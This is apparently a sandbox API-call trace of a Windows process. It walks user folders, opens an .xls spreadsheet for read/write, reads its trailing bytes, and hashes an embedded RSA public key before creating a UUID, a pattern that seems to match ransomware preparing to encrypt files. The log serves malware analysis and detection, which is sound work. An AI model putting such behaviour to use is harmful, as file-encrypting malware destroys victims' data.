[0190.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.801] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0190.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0190.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0190.801] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0190.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30ac0 [0190.802] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0190.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.802] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0190.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.802] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0190.802] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0190.802] PathFindFileNameW (pszPath="") returned="" [0190.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.802] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0190.802] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0190.803] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0190.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0190.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0190.803] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0190.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0190.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0190.803] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0190.803] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0190.803] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0190.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0190.803] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0190.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0190.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0190.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0190.804] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\") returned="PRpouSq\\" [0190.804] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\") returned="ZsR7Xc26_DfdmVcahH\\" [0190.804] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0190.804] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0190.804] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0190.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0190.804] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0190.804] PathFindFileNameW (pszPath="") returned="" [0190.805] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\prpousq\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72ba2a10, ftCreationTime.dwHighDateTime=0x1d8a2d0, ftLastAccessTime.dwLowDateTime=0xe4734960, ftLastAccessTime.dwHighDateTime=0x1d8a61e, ftLastWriteTime.dwLowDateTime=0xe4734960, ftLastWriteTime.dwHighDateTime=0x1d8a61e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0190.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0190.807] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72ba2a10, ftCreationTime.dwHighDateTime=0x1d8a2d0, ftLastAccessTime.dwLowDateTime=0xe4734960, ftLastAccessTime.dwHighDateTime=0x1d8a61e, ftLastWriteTime.dwLowDateTime=0xe4734960, ftLastWriteTime.dwHighDateTime=0x1d8a61e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0190.807] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf0a8c90, ftCreationTime.dwHighDateTime=0x1d8a143, ftLastAccessTime.dwLowDateTime=0x4e52c1e0, ftLastAccessTime.dwHighDateTime=0x1d8a3ee, ftLastWriteTime.dwLowDateTime=0x4e52c1e0, ftLastWriteTime.dwHighDateTime=0x1d8a3ee, nFileSizeHigh=0x0, nFileSizeLow=0x9e97, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBvsts1.xls", cAlternateFileName="")) returned 1 [0190.807] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\BBvsts1.xls") returned=".xls" [0190.807] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\BBvsts1.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\prpousq\\bbvsts1.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.809] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=40599) returned 1 [0190.809] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.812] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9e71, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.812] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.814] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.814] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x9e97, lpOverlapped=0x0) returned 1 [0190.815] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.815] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.816] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.816] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0190.817] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.817] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.817] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.817] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.817] GetLastError () returned 0x0 [0190.817] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0190.817] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0190.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.817] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.817] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0190.817] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9ea0) returned 0x2d45778 [0190.818] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0190.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30ac0 [0190.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bb0 [0190.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30a78 [0190.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bc8 [0190.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bf8 [0190.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c58 [0190.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c10 [0190.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.819] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0190.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c58 [0190.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0190.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c10 [0190.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39bf8 [0190.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0190.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0190.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0190.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.821] 